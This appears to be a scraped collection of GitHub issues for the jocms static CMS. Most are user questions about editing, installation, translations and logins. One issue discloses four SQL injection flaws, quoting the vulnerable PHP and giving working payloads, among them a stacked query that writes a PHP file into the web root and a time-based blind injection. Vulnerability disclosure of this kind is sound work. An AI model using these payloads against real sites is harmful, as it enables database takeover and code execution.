mxgbr / jocms Goto Github PK

Title says it all. While a data-jo="true" element is inside a data-jo-content="repeated" container, there is no option of editing it! One use case where this really hinders the usability is for example - restaurant menus. If this error wasn't the case, the end user could freely edit their own menu, adding or removing lines and replacing them with new products, in its current state, this is not possible!

The websites in the file overview are displayed twice, but are actually only each solo on the server.

Other then that I like Your CMS very much I even sent You some $$$ via PayPal. Would be nice if you fix the security issues first (mentioned by a other GitHub member at one of the issues) and then you`ll get it stable.

I am very curious about the future - really great CMS.

Please keep it up and don't let stupid comments and parasites stop you from further developing this CMS.

Best regards from Stuttgart,

Andi :)

Hello :)

is there a reason to upload files like .pdf ? That will be amazing !

and I want to say that i love your Tool !
It is super easy and productive and its the best reason to get editable content to a static developed website.

Thank you 🥇

Hi,
I would take a first view of this static CMS but the website is down.

Cheers

I cannot log in. Here's the cookie if that helps:

1.SQL Injection vulnerability

In jocms/apps/mask/inc/mask.php line 18~23:

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $mask = jo_get_masks($decoded["id"])[0];

function jo_json_check() will return JSON data submitted by users:

function jo_json_check(){
  if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
      return false;
  }

  $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
  if(strpos(strtolower($contentType), 'application/json') != 0){
      return false;
  }

  $content = trim(file_get_contents("php://input"));

  $decoded = json_decode($content, true);

  if(!is_array($decoded)){
      return false;
  }
  return $decoded;
}

then jo_get_masks() will execute SQL statement.

function jo_get_masks($id){
    $condition = "";
    $masks = [];
    if($id != "all"){
        $condition = " WHERE id='".$id."' ";
    }else{
        $condition = " WHERE type='mask' ";
    }
    $code;
    $handle = jocms_db_link();
    $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
    while($output = $result->fetchArray()){
        $masks[] = $output;
    }
    return $masks;
}

There is no filtering for the input parameter,so we can use single quotation marks to close and inject.payload:

{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}

2.SQL Injection vulnerability

In jocms/apps/mask/inc/getmask.php line 16~21

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $masks = jo_get_masks($decoded["content"]);

It's similar to the one above. Just change the id to content.payload:

{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}

3.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 19~30

if(isset($_POST["saved"])){
    if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
        $code = $_POST["code"];
        $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
        $domobject = str_get_html ($code);
        $attr = "data-jo-content";
        $mask = $domobject->find("*", 0);
        $mask->$attr = "noneditable";
        $code = str_replace("--jo:r--", PHP_EOL,  $domobject->save());
        jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
    }
}

user controlled parameters will pass into the function jo_set_mask().

In jocms/core/inc/db.php line 253:

function jo_set_mask($id, $name, $type, $code){
    $handle = jocms_db_link();
    if($id != 0){
        $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
        $return = $id;
    }else{
        $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
        $return = $handle->lastInsertRowid();
    }
    return $return;
}

No filtering for parameters so we can execute any SQL statement.

we can write a php code by this:

saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx

visit:

4.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 31~33:

if(isset($_GET["deleted"]) AND isset($_GET["id"])){
    jo_delete_mask($_GET["id"]);
}

follow function jo_delete_mask():

function jo_delete_mask($id){
    $handle = jocms_db_link();
    $result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
    return $result;
}

No filtering for parameter id,so we can inject,use time based injection:

?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'

An error occurred:

Cannot access the database. Please check the permissions. (ERR_404_DB) Unable to open database: unable to open database file

I've tried to enable permissions but i dont know what is wrong.
Any help is appreciated.

FIXED: sudo chmod o+w /var/www/html/jocms/core/database/
that did the trick

I have removed the ".php" file extensions via the .htaccess file. This is causing an error and the cms will not work.
If I add the ".php" manually the cms works fine.

Is there a way to fix this?

Thank you

.

Guten Tag ! Vielen Dank für Ihre schöne Entwicklung ! Leider auf der Website http://www.coast-cms.de/ ich habe kein Feedback gefunden, also Schreibe ich hier ! Ich mag coast-cms wirklich ! Vielen Dank für Ihre gute Arbeit ! Ich habe eine übersetzung ins russische gemacht. Wo kann ich die übersetzungsdatei für die Community senden ? Ich wollte Sie Fragen, das Projekt coast-cms nicht mehr entwickelt es ersetzt das Projekt jocms oder Sie beide parallel entwickeln ? Nach dem Projekt coast-cms wollte ich Fragen, ob es möglich ist, die Adresse des Administrators für die Sicherheit anstelle des cms zu ändern.php auf jedem anderen ? Kann diese überschreibung in der Einstellungsdatei ausgegeben werden ? Und noch eine Frage, wenn Sie in der Datei htaccess tun, um die HTML-Erweiterung in der Adressleiste nicht anzuzeigen, dann ist es nicht möglich, zu Bearbeiten, was in diesem Fall getan werden kann ? Wie deaktiviere ich die HTML-dateiüberprüfungsfunktion ? Vielen Dank im Voraus für die Antwort !

Good afternoon! Thank you for your wonderful developments ! Unfortunately on the site http://www.coast-cms.de/ I didn't find any feedback, so I'm writing here ! I really like coast-cms ! Thank you very much for your work ! I made a translation into Russian. Where do I send the translation file for the community ? I wanted to ask you if the coast-cms project is no longer being developed, it has been replaced by the jocms project, or are they both developing in parallel ? For the coast-cms project, I wanted to ask whether it is possible to change the address of the admin panel for security instead of cms.php on any other ? Can this override be output to the settings file ? And one more question if in the htaccess file you do not show the html extension in the address bar then it is not possible to edit what can be done in this case ? How do I disable the html file validation feature ? Thank you in advance for your answer !

First of all thanks for this great product, as a long time user of coast cms, jocms seems like a possible successor.
During my tests of the systems it seemed to only work if installed in the root directory (www.test.com/jocms/), it would be nice to have the option to use it also within directories, also for local development (www.test.com/test1/jocms/ or localhost/test1/jocms)
I've also sent a short mail to your address concerning professional usage, just wanted to make sure, you've got it.

Installer.zip

nl.json.zip

I took the liberty to update the installer, so all the texts are in the given language.
I have tested these and it works with php version 8.1 i also have a updated nl.json which missed some translations in the Core/lang/nl.json

Is there a way to delete the 2 hour login as a administrator? For some reason after too fast trying the password it locked me out, i am trying this script with php8.xx and sofar it seems to work.

Hi there,

Is there any way to set the default "Blocks" setting to Div instead of Paragraph (under menu Formats > Blocks?).

Thanks,
Ryan

Is it possible to get or host a copy of the documentation? Unfortunately the website is down, and without any documentation it is hard to get it running.

Can only log in under administrator account even though I have set up a user account and confirmed credentials are correct.

is there a way to add a page using the jocms interface ?